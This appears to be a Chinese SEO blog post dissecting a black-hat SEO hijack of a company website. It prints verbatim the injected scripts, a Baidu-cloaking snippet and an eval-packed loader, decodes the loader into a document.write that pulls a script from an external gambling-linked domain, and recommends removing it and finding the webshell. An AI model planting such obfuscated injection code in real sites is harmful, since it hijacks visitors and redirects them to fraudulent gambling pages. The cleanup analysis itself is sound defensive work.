武汉seo

seo优化,seo基础,seo教程

解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容

​​

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

上午上q,刚登上去,老铁跟我讲被欺负了,网站从百度搜索进去,首页发生跳转到菠菜(博彩)网,开发公司的说可能是百度的问题,不是我们的问题,这种判断能力我只能说智商堪忧,又是xxxxx的网站开发公司。

直接进入正题,直接site:www.zyisolar.com

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

打开首页发生了跳转,到https://www.365da8s.com/zh-cn/这个菠菜,其他页面没有,劫持代码只放在首页,我们直接看代码

如果是无法直接从首页查看源码的情况,那么在浏览器输入view-source:域名 就可以查看网页源码

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

只需要看头部代码好熟悉,黑帽seo这行技术这几年也没什么创新,删除这两行就可以解决基本问题

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”中亿光伏-品牌光伏集成商”}</script>

<script type=”text/javascript”>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘l[“\e\c\1\n\f\8\o\0”][“\7\3\9\0\8”](‘\g\2\1\3\9\4\0 \0\m\4\8\d\6\0\8\j\0\5\h\a\k\a\2\1\3\9\4\0\6 \2\3\1\d\6\t\0\0\4\2\u\5\5\7\7\7\b\v\1\e\a\2\q\b\1\c\f\5\r\p\s\b\h\2\6\i\g\5\2\1\3\9\4\0\i’);’,32,32,’x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62′.split(‘|’),0,{}))</script>

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

Keywords和description进行Unicode解码,结果:

bet365官方平台开户,bet365官方备用网址,bet365官方网站是多少,bet365官方亚洲版,bet365.com官方网站,bet365官方投注,bet365官方网站,bet365官方中文版,bet365中文官方网站,英国bet365官方网,bet365官方投注网站,bet365官方投注网址,bet365官方网投,bet365官方备用,bet365官方网站是多

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”中亿光伏-品牌光伏集成商”}</script>这段意思就是判断百度搜索访问用户进行跳转,你去360,搜狗搜索访问肯定是不会发生跳转的

然后我们再来解最后一段代码

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

先进行js解压,得出结果

《解决黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容》

javascript代码方式解密

1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 结果 document

2:\x77\x72\x69\x74\x65 结果 write

3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e

结果 <script type=”text/javascript” src=”https://www.bcdas8.com/365.js”></script>

整段的解密结果就是:

<script type=”text/javascript”> window[“document”][“write”] (‘<script type=”text/javascript” src=”https://www.bcdas8.com/365.js”></script>’); </script>

到了这里整个过程已经很清晰了,虽然我们删除了这段代码但只能暂时解决问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是通过目前已经开放的漏洞,所以相对还是比较容易处理

大多数人对网站的理解还停留在视觉层面,网络安全的重要性反而被忽视,曾经我也主攻过渗透攻防,以打击菠菜(博彩)和成人色情,传销等网站服务器为乐,我涉及这块技术的目的不是为了干点什么,而是为了解决问题。任何公司需要提高对网络安全的重视,找网络开发公司也要避免入坑​​​​

 

点赞